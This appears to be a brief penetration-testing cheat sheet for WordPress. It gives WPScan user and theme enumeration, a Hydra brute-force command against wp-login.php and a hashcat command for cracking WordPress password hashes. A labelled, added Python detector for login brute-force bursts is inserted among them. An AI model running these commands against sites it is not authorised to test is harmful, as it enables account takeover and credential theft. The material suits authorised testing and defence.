Quick techniques and tools for basic attacks on WordPress websites:
WPScan
$ wpscan -u http://pentest.local/weblog/ --enumerate t --enumerate u
$ wpscan --random-agent -u http://pentest.local --proxy 127.0.0.1:8080
Note: Don't trust WPScan's results; always check all plugins against Searchsploit for vulnerabilities!
Brute-forcing WordPress login credentials
$ hydra -l admin -P password.txt -V x.x.x.x http-post-form "/wp-login.php:log=admin&pwd=^PASS^:ERROR"
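What the brute-force run above looks like from the server side, as an added detection example (not part of the original notes). It assumes an access log in Combined Log Format and default WordPress behaviour, where a failed POST to wp-login.php returns 200 and a successful login returns 302; the function names, threshold, window and log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: six rapid failures then a redirect from one client,
# and one ordinary user who mistypes a password once.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Mar/2024:10:00:{s:02d} +0000] '
    '"POST /weblog/wp-login.php HTTP/1.1" 200 4312'
    for s in range(6)
] + [
    '203.0.113.7 - - [10/Mar/2024:10:00:06 +0000] "POST /weblog/wp-login.php HTTP/1.1" 302 0',
    '198.51.100.4 - - [10/Mar/2024:10:01:00 +0000] "POST /weblog/wp-login.php HTTP/1.1" 200 4312',
    '198.51.100.4 - - [10/Mar/2024:10:01:09 +0000] "POST /weblog/wp-login.php HTTP/1.1" 302 0',
]

# client IP, timestamp, method, path, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0], int(status)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Map each flagged IP to its peak failure count and whether a login then succeeded."""
    recent = defaultdict(deque)  # ip -> failed-login timestamps still inside the window
    findings = {}
    for rec in filter(None, map(parse, lines)):
        ip, when, method, path, status = rec
        if method != "POST" or not path.endswith("/wp-login.php"):
            continue
        q = recent[ip]
        while q and when - q[0] > window:
            q.popleft()  # drop failures that have aged out of the window
        if status == 200:  # login form re-rendered: wrong password
            q.append(when)
            if len(q) >= threshold:
                f = findings.setdefault(ip, {"failures": 0, "success_after_burst": False})
                f["failures"] = max(f["failures"], len(q))
        elif status == 302 and len(q) >= threshold:
            # redirect straight after a burst of failures: treat as a likely compromise
            findings[ip]["success_after_burst"] = True
    return findings
```

Behind a reverse proxy or CDN the first log field is the proxy address, so group on the forwarded client IP instead.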
Cracking WordPress password hash
hashcat --force -m 400 -a 0 -o wp-cracked.txt wp-hash.txt /usr/share/wordlists/rockyou.txt